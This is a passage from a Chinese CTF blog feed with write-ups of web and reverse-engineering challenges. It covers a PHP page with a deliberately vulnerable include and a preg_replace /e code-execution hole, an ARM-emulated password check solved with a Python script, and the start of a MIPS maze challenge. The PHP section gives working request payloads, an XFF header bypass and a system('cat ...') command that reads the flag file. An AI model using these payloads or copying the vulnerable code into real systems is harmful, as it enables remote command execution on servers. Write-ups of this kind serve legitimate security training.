class="comment"><!-- 这里的 checked 的状æ€�å�ªæ˜¯æ¼”示 --></span></span></span></span><br><span class="line"><span class="handlebars"><span class="xml"> <span class="tag"><<span class="name">input</span> <span class="attr">type</span>=<span class="string">"checkbox"</span> <span class="attr">name</span>=<span class="string">"sex"</span> <span class="attr">value</span>=<span class="string">"</span></span></span><span class="template-variable">{{d.id}}</span><span class="xml"><span class="tag"><span class="string">"</span> <span class="attr">lay-skin</span>=<span class="string">"switch"</span> <span class="attr">lay-text</span>=<span class="string">"å¼€|å</span></span></span></span></span><br><span class="line"><span class="actionscript">³<span class="string">" lay-filter="</span>checkDemo<span class="string">" {{ d.id==1 0003 ? 'checked' : '' }}></span></span></span><br><span class="line"> <span class="tag"></<span class="name">script</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">script</span> <span class="attr">src</span>=<span class="string">"layui/layui.js"</span> <span class="attr">charset</span>=<span class="string">"utf-8"</span>></span><span class="tag"></<span class="name">script</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">script</span>></span></span><br><span class="line"><span class="actionscript"> layui.use(<span class="string">'table'</span>, <span class="function"><span class="keyword">function</span><span class="params">()</span> </span>{</span></span><br><span class="line"><span class="actionscript"> <span class="keyword">var</span> table = layui.table,</span></span><br><span class="line"> form = layui.form;</span><br><span class="line"></span><br><span class="line"> table.render({</span><br><span class="line"><span class="actionscript"> elem: <span class="string">'#test'</span>,</span></span><br><span class="line"><span class="actionscript"> url: <span class="string">'/somrthing.json'</span>,</span></span><br><span class="line"> cellMinWidth: 80,</span><br><span class="line"> cols: [</span><br><span class="line"> [</span><br><span class="line"><span class="actionscript"> { type: <span class="string">'numbers'</span> },</span></span><br><span class="line"><span class="actionscript"> { type: <span class="string">'checkbox'</span> },</span></span><br><span class="line"><span class="actionscript"> { field: <span class="string">'id'</span>, title: <span class="string">'ID'</span>, width: <span class="number">100</span>, unresize: <span class="literal">true</span>, sort: <span class="literal">true</span> },</span></span><br><span class="line"><span class="actionscript"> { field: <span class="string">'name'</span>, title: <span class="string">'设备å��'</span>, templet: <span class="string">'#nameTpl'</span> },</span></span><br><span class="line"><span class="actionscript"> { field: <span class="string">'area'</span>, title: <span class="string">'区域'</span> },</span></span><br><span class="line"><span class="actionscript"> { field: <span class="string">'status'</span>, title: <span class="string">'维护状æ€�'</span>, minWidth: <span class="number">120</span>, sort: <span class="literal">true</span> },</span></span><br><span class="line"><span class="actionscript"> { field: <span class="string">'check'</span>, title: <span class="string">'设备开å</span></span></span><br><span class="line">³', width: 85, templet: '#switchTpl', unresize: true }</span><br><span class="line"> ]</span><br><span class="line"> ],</span><br><span class="line"><span class="actionscript"> page: <span class="literal">true</span></span></span><br><span class="line"> });</span><br><span class="line"> });</span><br><span class="line"> <span class="tag"></<span class="name">script</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">script</span>></span></span><br><span class="line"><span class="actionscript"> layui.use(<span class="string">'element'</span>, <span class="function"><span class="keyword">function</span><span class="params">()</span> </span>{</span></span><br><span class="line"><span class="actionscript"> <span class="keyword">var</span> element = layui.element; <span class="comment">//导航的hover效果ã€�二级è�œå�•ç‰åŠŸèƒ½ï¼Œéœ€è¦�ä¾�èµ–element模å�—</span></span></span><br><span class="line"><span class="actionscript"> <span class="comment">//监å�¬å¯¼èˆªç‚¹å‡»</span></span></span><br><span class="line"><span class="actionscript"> element.on(<span class="string">'nav(demo)'</span>, <span class="function"><span class="keyword">function</span><span class="params">(elem)</span> </span>{</span></span><br><span class="line"><span class="actionscript"> <span class="comment">//console.log(elem)</span></span></span><br><span class="line"> layer.msg(elem.text());</span><br><span class="line"> });</span><br><span class="line"> });</span><br><span class="line"> <span class="tag"></<span class="name">script</span>></span></span><br><span class="line"></span><br><span class="line"><span class="php"><span class="meta"><?php</span></span></span><br><span class="line"></span><br><span class="line"><span class="php">$page = $_GET[page];</span></span><br><span class="line"></span><br><span class="line"><span class="php"><span class="keyword">if</span> (<span class="keyword">isset</span>($page)) {</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="php"><span class="keyword">if</span> (ctype_alnum($page)) {</span></span><br><span class="line"><span class="php"><span class="meta">?></span></span></span><br><span class="line"></span><br><span class="line"> <span class="tag"><<span class="name">br</span> /></span><span class="tag"><<span class="name">br</span> /></span><span class="tag"><<span class="name">br</span> /></span><span class="tag"><<span class="name">br</span> /></span></span><br><span class="line"> <span class="tag"><<span class="name">div</span> <span class="attr">style</span>=<span class="string">"text-align:center"</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">p</span> <span class="attr">class</span>=<span class="string">"lead"</span>></span><span class="php"><span class="meta"><?php</span> <span class="keyword">echo</span> $page; <span class="keyword">die</span>();<span class="meta">?></span></span><span class="tag"></<span class="name">p</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">br</span> /></span><span class="tag"><<span class="name">br</span> /></span><span class="tag"><<span class="name">br</span> /></span><span class="tag"><<span class="name">br</span> /></span></span><br><span class="line"></span><br><span class="line"><span class="php"><span class="meta"><?php</span></span></span><br><span class="line"></span><br><span class="line"><span class="php">}<span class="keyword">else</span>{</span></span><br><span class="line"></span><br><span class="line"><span class="php"><span class="meta">?></span></span></span><br><span class="line"> <span class="tag"><<span class="name">br</span> /></span><span class="tag"><<span class="name">br</span> /></span><span class="tag"><<span class="name">br</span> /></span><span class="tag"><<span class="name">br</span> /></span></span><br><span class="line"> <span class="tag"><<span class="name">div</span> <span class="attr">style</span>=<span class="string">"text-align:center"</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">p</span> <span class="attr">class</span>=<span class="string">"lead"</span>></span></span><br><span class="line"> <span class="php"><span class="meta"><?php</span></span></span><br><span class="line"></span><br><span class="line"><span class="php"> <span class="keyword">if</span> (strpos($page, <span class="string">'input'</span>) > <span class="number">0</span>) {</span></span><br><span class="line"><span class="php"> <span class="keyword">die</span>();</span></span><br><span class="line"><span class="php"> }</span></span><br><span class="line"></span><br><span class="line"><span class="php"> <span class="keyword">if</span> (strpos($page, <span class="string">'ta:text'</span>) > <span class="number">0</span>) {</span></span><br><span class="line"><span class="php"> <span class="keyword">die</span>();</span></span><br><span class="line"><span class="php"> }</span></span><br><span class="line"></span><br><span class="line"><span class="php"> <span class="keyword">if</span> (strpos($page, <span class="string">'text'</span>) > <span class="number">0</span>) {</span></span><br><span class="line"><span class="php"> <span class="keyword">die</span>();</span></span><br><span class="line"><span class="php"> }</span></span><br><span class="line"></span><br><span class="line"><span class="php"> <span class="keyword">if</span> ($page === <span class="string">'index.php'</span>) {</span></span><br><span class="line"><span class="php"> <span class="keyword">die</span>(<span class="string">'Ok'</span>);</span></span><br><span class="line"><span class="php"> }</span></span><br><span class="line"><span class="php"> <span class="keyword">include</span>($page);</span></span><br><span class="line"><span class="php"> <span class="keyword">die</span>();</span></span><br><span class="line"><span class="php"> <span class="meta">?></span></span></span><br><span class="line"> <span class="tag"></<span class="name">p</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">br</span> /></span><span class="tag"><<span class="name">br</span> /></span><span class="tag"><<span class="name">br</span> /></span><span class="tag"><<span class="name">br</span> /></span></span><br><span class="line"></span><br><span class="line"><span class="php"><span class="meta"><?php</span></span></span><br><span class="line"><span class="php">}}</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="php"><span class="comment">//方便的实现输å</span></span></span><br><span class="line"><span class="php">¥è¾“出的功能,æ£åœ¨å¼€å�‘ä¸çš„功能,å�ªèƒ½å†</span></span><br><span class="line"><span class="php">部人员测试</span></span><br><span class="line"></span><br><span class="line"><span class="php"><span class="keyword">if</span> ($_SERVER[<span class="string">'HTTP_X_FORWARDED_FOR'</span>] === <span class="string">'127.0.0.1'</span>) {</span></span><br><span class="line"></span><br><span class="line"><span class="php"> <span class="keyword">echo</span> <span class="string">"<br >Welcome My Admin ! <br >"</span>;</span></span><br><span class="line"></span><br><span class="line"><span class="php"> $pattern = $_GET[pat];</span></span><br><span class="line"><span class="php"> $replacement = $_GET[rep];</span></span><br><span class="line"><span class="php"> $subject = $_GET[sub];</span></span><br><span class="line"></span><br><span class="line"><span class="php"> <span class="keyword">if</span> (<span class="keyword">isset</span>($pattern) && <span class="keyword">isset</span>($replacement) && <span class="keyword">isset</span>($subject)) {</span></span><br><span class="line"><span class="php"> preg_replace($pattern, $replacement, $subject);</span></span><br><span class="line"><span class="php"> }<span class="keyword">else</span>{</span></span><br><span class="line"><span class="php"> <span class="keyword">die</span>();</span></span><br><span class="line"><span class="php"> }</span></span><br><span class="line"></span><br><span class="line"><span class="php">}</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="php"><span class="meta">?></span></span></span><br><span class="line"></span><br><span class="line"><span class="tag"></<span class="name">body</span>></span></span><br><span class="line"></span><br><span class="line"><span class="tag"></<span class="name">html</span>></span></span><br></pre></td></tr></table></figure></div><p>发现了危险函数<strong>preg_replace()</strong>,存在命令执行漏洞。</p><p>preg_replace( pattern , replacement , subject ) : 当pattern指明/e标志时 ,preg_replace()会将replacement部分的代码当作PHP代码执行 (简单的说就是将replacement参数值放入eval()结构中)</p><p>payload:<code>/index.php?pat=/test/e&rep=phpinfo()&sub=test</code>,这里还需要一个XFF绕过(至于为什么请看源码),可以用BurpSuite的Repeater来测试:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/06/JeRE8j7oHXBgvqP.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>最终拿到flag的payload:<code>/index.php?pat=/test/e&rep=system('cat%20./s3chahahaDir/flag/flag.php')&sub=test</code>:</p><h2 id="Triangle"><a href="#Triangle" class="headerlink" title="Triangle"></a>Triangle</h2><p>进去之后先读一波JavaScript源码,源码的格式比较乱,可以用Chrome自带的代码格式化功能格式化一下:</p><p>util.js</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="JAVASCRIPT"><figure class="iseeu highlight /javascript"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">test_pw</span>(<span class="params">e, _</span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> t = stoh(atob(getBase64Image(<span class="string">"eye"</span>)))</span><br><span class="line"> , r = <span class="number">4096</span></span><br><span class="line"> , m = <span class="number">8192</span></span><br><span class="line"> , R = <span class="number">12288</span></span><br><span class="line"> , a = <span class="keyword">new</span> uc.Unicorn(uc.ARCH_ARM,uc.MODE_ARM);</span><br><span class="line"> a.reg_write_i32(uc.ARM_REG_R9, m),</span><br><span class="line"> a.reg_write_i32(uc.ARM_REG_R10, R),</span><br><span class="line"> a.reg_write_i32(uc.ARM_REG_R8, _.length),</span><br><span class="line"> a.mem_map(r, <span class="number">4096</span>, uc.PROT_ALL);</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">var</span> o = <span class="number">0</span>; o < o1.length; o++)</span><br><span class="line"> a.mem_write(r + o, [t[o1[o]]]);</span><br><span class="line"> a.mem_map(m, <span class="number">4096</span>, uc.PROT_ALL),</span><br><span class="line"> a.mem_write(m, stoh(_)),</span><br><span class="line"> a.mem_map(R, <span class="number">4096</span>, uc.PROT_ALL),</span><br><span class="line"> a.mem_write(R, stoh(e));</span><br><span class="line"> <span class="keyword">var</span> u = r</span><br><span class="line"> , c = r + o1.length;</span><br><span class="line"> <span class="keyword">return</span> a.emu_start(u, c, <span class="number">0</span>, <span class="number">0</span>),</span><br><span class="line"> a.reg_read_i32(uc.ARM_REG_R5)</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">enc_pw</span>(<span class="params">e</span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> _ = stoh(atob(getBase64Image(<span class="string">"frei"</span>)))</span><br><span class="line"> , t = <span class="number">4096</span></span><br><span class="line"> , r = <span class="number">8192</span></span><br><span class="line"> , m = <span class="number">12288</span></span><br><span class="line"> , R = <span class="keyword">new</span> uc.Unicorn(uc.ARCH_ARM,uc.MODE_ARM);</span><br><span class="line"> R.reg_write_i32(uc.ARM_REG_R8, r),</span><br><span class="line"> R.reg_write_i32(uc.ARM_REG_R9, m),</span><br><span class="line"> R.reg_write_i32(uc.ARM_REG_R10, e.length),</span><br><span class="line"> R.mem_map(t, <span class="number">4096</span>, uc.PROT_ALL);</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">var</span> a = <span class="number">0</span>; a < o2.length; a++)</span><br><span class="line"> R.mem_write(t + a, [_[o2[a]]]);</span><br><span class="line"> R.mem_map(r, <span class="number">4096</span>, uc.PROT_ALL),</span><br><span class="line"> R.mem_write(r, stoh(e)),</span><br><span class="line"> R.mem_map(m, <span class="number">4096</span>, uc.PROT_ALL);</span><br><span class="line"> <span class="keyword">var</span> o = t</span><br><span class="line"> , u = t + o2.length;</span><br><span class="line"> <span class="keyword">return</span> R.emu_start(o, u, <span class="number">0</span>, <span class="number">0</span>),</span><br><span class="line"> htos(R.mem_read(m, e.length))</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">get_pw</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">var</span> e = stoh(atob(getBase64Image(<span class="string">"templar"</span>))), _ = <span class="string">""</span>, t = <span class="number">0</span>; t < o3.length; t++)</span><br><span class="line"> _ += <span class="built_in">String</span>.fromCharCode(e[o3[t]]);</span><br><span class="line"> <span class="keyword">return</span> _</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><p>secret.js</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="JAVASCRIPT"><figure class="iseeu highlight /javascript"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">test_pw</span>(<span class="params">e, _</span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> t = stoh(atob(getBase64Image(<span class="string">"eye"</span>)))</span><br><span class="line"> , r = <span class="number">4096</span></span><br><span class="line"> , m = <span class="number">8192</span></span><br><span class="line"> , R = <span class="number">12288</span></span><br><span class="line"> , a = <span class="keyword">new</span> uc.Unicorn(uc.ARCH_ARM,uc.MODE_ARM);</span><br><span class="line"> a.reg_write_i32(uc.ARM_REG_R9, m),</span><br><span class="line"> a.reg_write_i32(uc.ARM_REG_R10, R),</span><br><span class="line"> a.reg_write_i32(uc.ARM_REG_R8, _.length),</span><br><span class="line"> a.mem_map(r, <span class="number">4096</span>, uc.PROT_ALL);</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">var</span> o = <span class="number">0</span>; o < o1.length; o++)</span><br><span class="line"> a.mem_write(r + o, [t[o1[o]]]);</span><br><span class="line"> a.mem_map(m, <span class="number">4096</span>, uc.PROT_ALL),</span><br><span class="line"> a.mem_write(m, stoh(_)),</span><br><span class="line"> a.mem_map(R, <span class="number">4096</span>, uc.PROT_ALL),</span><br><span class="line"> a.mem_write(R, stoh(e));</span><br><span class="line"> <span class="keyword">var</span> u = r</span><br><span class="line"> , c = r + o1.length;</span><br><span class="line"> <span class="keyword">return</span> a.emu_start(u, c, <span class="number">0</span>, <span class="number">0</span>),</span><br><span class="line"> a.reg_read_i32(uc.ARM_REG_R5)</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">enc_pw</span>(<span class="params">e</span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> _ = stoh(atob(getBase64Image(<span class="string">"frei"</span>)))</span><br><span class="line"> , t = <span class="number">4096</span></span><br><span class="line"> , r = <span class="number">8192</span></span><br><span class="line"> , m = <span class="number">12288</span></span><br><span class="line"> , R = <span class="keyword">new</span> uc.Unicorn(uc.ARCH_ARM,uc.MODE_ARM);</span><br><span class="line"> R.reg_write_i32(uc.ARM_REG_R8, r),</span><br><span class="line"> R.reg_write_i32(uc.ARM_REG_R9, m),</span><br><span class="line"> R.reg_write_i32(uc.ARM_REG_R10, e.length),</span><br><span class="line"> R.mem_map(t, <span class="number">4096</span>, uc.PROT_ALL);</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">var</span> a = <span class="number">0</span>; a < o2.length; a++)</span><br><span class="line"> R.mem_write(t + a, [_[o2[a]]]);</span><br><span class="line"> R.mem_map(r, <span class="number">4096</span>, uc.PROT_ALL),</span><br><span class="line"> R.mem_write(r, stoh(e)),</span><br><span class="line"> R.mem_map(m, <span class="number">4096</span>, uc.PROT_ALL);</span><br><span class="line"> <span class="keyword">var</span> o = t</span><br><span class="line"> , u = t + o2.length;</span><br><span class="line"> <span class="keyword">return</span> R.emu_start(o, u, <span class="number">0</span>, <span class="number">0</span>),</span><br><span class="line"> htos(R.mem_read(m, e.length))</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">get_pw</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">var</span> e = stoh(atob(getBase64Image(<span class="string">"templar"</span>))), _ = <span class="string">""</span>, t = <span class="number">0</span>; t < o3.length; t++)</span><br><span class="line"> _ += <span class="built_in">String</span>.fromCharCode(e[o3[t]]);</span><br><span class="line"> <span class="keyword">return</span> _</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><p>unicorn.js是一个JavaScript框架的源码,暂时不去管它。</p><p>我们把<code>get_pw()</code>在console里执行一下得到返回值:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/06/ElFStwzKPhqWsmR.png" alt="image-20210106224107993" title=""> </div> <div class="image-caption">image-20210106224107993</div> </figure><p>执行enc_pw和test_pw得到返回值:</p><p>enc_pw: <code>\x08\x00\xa0\xe1\x09\x10\xa0\xe1\x0a\x20\xa0\xe1\x00\x30\xa0\xe3\x00\x50\xa0\xe3\x00\x40\xd0\xe5\x01\x00\x55\xe3\x01\x00\x00\x1a\x03\x60\x03\xe2\x06\x40\x84\xe0\x06\x40\x84\xe2\x01\x50\x04\xe2\x00\x40\xc1\xe5\x01\x00\x80\xe2\x01\x10\x81\xe2\x01\x30\x83\xe2\x02\x00\x53\xe1\xf2\xff\xff\xba\x00\x00\xa0\xe3\x00\x10\xa0\xe3\x00\x20\xa0\xe3\x00\x30\xa0\xe3\x00\x40\xa0\xe3\x00\x50\xa0\xe3\x00\x60\xa0\xe3\x00\x70\xa0\xe3\x00\x90\xa0\xe3\x00\xa0\xa0\xe3</code></p><p>test_pw: <code>\x09\x00\xa0\xe1\x0a\x10\xa0\xe1\x08\x30\xa0\xe1\x00\x40\xa0\xe3\x00\x50\xa0\xe3\x00\xc0\xa0\xe3\x00\x20\xd0\xe5\x00\x60\xd1\xe5\x05\x60\x86\xe2\x01\xc0\x04\xe2\x00\x00\x5c\xe3\x00\x00\x00\x0a\x03\x60\x46\xe2\x06\x00\x52\xe1\x05\x00\x00\x1a\x01\x00\x80\xe2\x01\x10\x81\xe2\x01\x40\x84\xe2\x03\x00\x54\xe1\xf1\xff\xff\xba\x01\x50\xa0\xe3\x00\x00\xa0\xe3\x00\x10\xa0\xe3\x00\x20\xa0\xe3\x00\x30\xa0\xe3\x00\x40\xa0\xe3\x00\x60\xa0\xe3\x00\x70\xa0\xe3\x00\x80\xa0\xe3\x00\x90\xa0\xe3\x00\xa0\xa0\xe3\x00\xc0\xa0\xe3</code></p><p>直接转换得到的是乱码,卡了一会儿后才发现js源码中出现了“ARM”,同时Unicorn.js里也有不少“ARM”:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/06/es9oQD3hEM4baT7.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>百度了一下发现是一种CPU,并找到一个十六进制与ARM代码的转换器:<a href="https://links.jianshu.com/go?to=http%3A%2F%2Farmconverter.com%2Fhextoarm%2F" target="_blank" rel="noopener">http://armconverter.com/hextoarm/</a></p><p>把text_pw和enc_pw得到的十六进制字符串去掉前面的\x并用转换器转换一下,得到以下汇编代码:</p><p>enc_pw:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">MOV R0, R8</span><br><span class="line">MOV R1, SB</span><br><span class="line">MOV R2, SL</span><br><span class="line">MOV R3, #0</span><br><span class="line">MOV R5, #0</span><br><span class="line">LDRB R4, [R0]</span><br><span class="line">CMP R5, #1</span><br><span class="line">BNE #0x28</span><br><span class="line">AND R6, R3, #3</span><br><span class="line">ADD R4, R4, R6</span><br><span class="line">ADD R4, R4, #6</span><br><span class="line">AND R5, R4, #1</span><br><span class="line">STRB R4, [R1]</span><br><span class="line">ADD R0, R0, #1</span><br><span class="line">ADD R1, R1, #1</span><br><span class="line">ADD R3, R3, #1</span><br><span class="line">CMP R3, R2</span><br><span class="line">BLT #0x14</span><br><span class="line">MOV R0, #0</span><br><span class="line">MOV R1, #0</span><br><span class="line">MOV R2, #0</span><br><span class="line">MOV R3, #0</span><br><span class="line">MOV R4, #0</span><br><span class="line">MOV R5, #0</span><br><span class="line">MOV R6, #0</span><br><span class="line">MOV R7, #0</span><br><span class="line">MOV SB, #0</span><br><span class="line">MOV SL, #0</span><br></pre></td></tr></table></figure></div><p>test_pw:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">MOV R0, SB</span><br><span class="line">MOV R1, SL</span><br><span class="line">MOV R3, R8</span><br><span class="line">MOV R4, #0</span><br><span class="line">MOV R5, #0</span><br><span class="line">MOV IP, #0</span><br><span class="line">LDRB R2, [R0]</span><br><span class="line">LDRB R6, [R1]</span><br><span class="line">ADD R6, R6, #5</span><br><span class="line">AND IP, R4, #1</span><br><span class="line">CMP IP, #0 </span><br><span class="line">BEQ #0x34</span><br><span class="line">SUB R6, R6, #3</span><br><span class="line">CMP R2, R6</span><br><span class="line">BNE #0x54</span><br><span class="line">ADD R0, R0, #1</span><br><span class="line">ADD R1, R1, #1</span><br><span class="line">ADD R4, R4, #1</span><br><span class="line">CMP R4, R3</span><br><span class="line">BLT #0x18</span><br><span class="line">MOV R5, #1</span><br><span class="line">MOV R0, #0</span><br><span class="line">MOV R1, #0</span><br><span class="line">MOV R2, #0</span><br><span class="line">MOV R3, #0</span><br><span class="line">MOV R4, #0</span><br><span class="line">MOV R6, #0</span><br><span class="line">MOV R7, #0</span><br><span class="line">MOV R8, #0</span><br><span class="line">MOV SB, #0</span><br><span class="line">MOV SL, #0</span><br><span class="line">MOV IP, #0</span><br></pre></td></tr></table></figure></div><p>完全不懂汇编的本渣渣表示彻底懵了,难道Web和逆向都精通才是未来的趋势吗???</p><p>这其实是道逆向题。(雾)</p><p>于是只好去搜了wp,发现上面的汇编码用Python写是这样的:</p><p>enc_pw:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">enc_pw</span><span class="params">(s)</span>:</span></span><br><span class="line"> res = <span class="string">''</span></span><br><span class="line"> f = <span class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> i, c <span class="keyword">in</span> enumerate(s):</span><br><span class="line"> c = ord(c)</span><br><span class="line"> <span class="keyword">if</span> f == <span class="number">1</span>:</span><br><span class="line"> c += i & <span class="number">3</span></span><br><span class="line"> c += <span class="number">6</span></span><br><span class="line"> f = c & <span class="number">1</span></span><br><span class="line"> res += chr(c)</span><br><span class="line"> <span class="keyword">return</span> res</span><br></pre></td></tr></table></figure></div><p>test_pw:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">test_pw</span><span class="params">(s, t)</span>:</span></span><br><span class="line"> <span class="keyword">for</span> i, (c, d) <span class="keyword">in</span> enumerate(zip(s, t)):</span><br><span class="line"> c, d = ord(c), ord(d)</span><br><span class="line"> c += <span class="number">5</span></span><br><span class="line"> <span class="keyword">if</span> i & <span class="number">1</span>:</span><br><span class="line"> c -= <span class="number">3</span></span><br><span class="line"> <span class="keyword">if</span> c != d:</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span></span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span></span><br></pre></td></tr></table></figure></div><p>解密脚本:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> string</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">enc_pw</span><span class="params">(s)</span>:</span></span><br><span class="line"> res = <span class="string">''</span></span><br><span class="line"> f = <span class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> i, c <span class="keyword">in</span> enumerate(s):</span><br><span class="line"> c = ord(c)</span><br><span class="line"> <span class="keyword">if</span> f == <span class="number">1</span>:</span><br><span class="line"> c += i & <span class="number">3</span></span><br><span class="line"> c += <span class="number">6</span></span><br><span class="line"> f = c & <span class="number">1</span></span><br><span class="line"> res += chr(c)</span><br><span class="line"> <span class="keyword">return</span> res</span><br><span class="line"></span><br><span class="line">encrypted = <span class="string">'XYzaSAAX_PBssisodjsal_sSUVWZYYYb'</span></span><br><span class="line">flag = <span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i, c <span class="keyword">in</span> enumerate(encrypted):</span><br><span class="line"> c = ord(c)</span><br><span class="line"> c -= <span class="number">5</span></span><br><span class="line"> <span class="keyword">if</span> i & <span class="number">1</span> != <span class="number">0</span>:</span><br><span class="line"> c += <span class="number">3</span></span><br><span class="line"> <span class="keyword">for</span> d <span class="keyword">in</span> string.printable:</span><br><span class="line"> <span class="keyword">if</span> enc_pw(flag + d)[i] == chr(c):</span><br><span class="line"> flag += d</span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line"> <span class="keyword">print</span> flag</span><br></pre></td></tr></table></figure></div><p>跑一下这个脚本得到flag</p>]]></content>
<summary type="html">
<p>网安实验被迫写WEB!</p>
</summary>
<category term="CTF" scheme="https://github.com/gha01un/gha01un.github.io/categories/CTF/"/>
<category term="Web" scheme="https://github.com/gha01un/gha01un.github.io/tags/Web/"/>
</entry>
<entry>
<title>XCTF-华为专场</title>
<link href="https://github.com/gha01un/gha01un.github.io/2021/01/06/[12.20]%20%E5%8D%8E%E4%B8%BA%E4%BA%91%E4%B8%93%E5%9C%BA/"/>
<id>https://github.com/gha01un/gha01un.github.io/2021/01/06/[12.20]%20%E5%8D%8E%E4%B8%BA%E4%BA%91%E4%B8%93%E5%9C%BA/</id>
<published>2021-01-06T13:51:14.710Z</published>
<updated>2021-01-11T02:06:21.130Z</updated>
<content type="html"><![CDATA[<p>华为三场比赛</p><a id="more"></a><h1 id="12-23-鲲鹏计算专场"><a href="#12-23-鲲鹏计算专场" class="headerlink" title="[12.23] 鲲鹏计算专场"></a>[12.23] 鲲鹏计算专场</h1><h2 id="mips"><a href="#mips" class="headerlink" title="mips"></a>mips</h2><p>mips架构。</p><p>ida反编译以后可以看到</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/07/48HWvRVPKY2DSrt.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>v4是我们输入的字符串,很明显是迷宫逻辑,上下左右用wasd走,迷宫存在dword_100111F0里。</p><p>sub_10000744()这个初始函数是用来找起点用的(就是迷宫中3所在的地方,在后面可以看到3其实表示的是当前位置)。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/07/c9DZrzjpOKIhWJT.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>这里也可以看到应该有多个迷宫(dword_10011D10是用来表示第几个迷宫的,且<=2,一个迷宫有225个数)+一个迷宫宽为15=三个迷宫,每个迷宫为15*15。</p><p>然后就是下面的四个函数,随便挑一个出来(比如sub_10000D28())可以看到</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="C:\Users\大仑子\AppData\Roaming\Typora\typora-user-images\image-20210107193752532.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>很明显是个往右走的函数,3表示当前位置,并把上一个当前位置标为1(可走路径)。并且可以看到终点是4,就是说我们要把每个迷宫从3走到4。</p><p>dump迷宫数组,写脚本打印迷宫:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">aMap=[<span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">3</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span 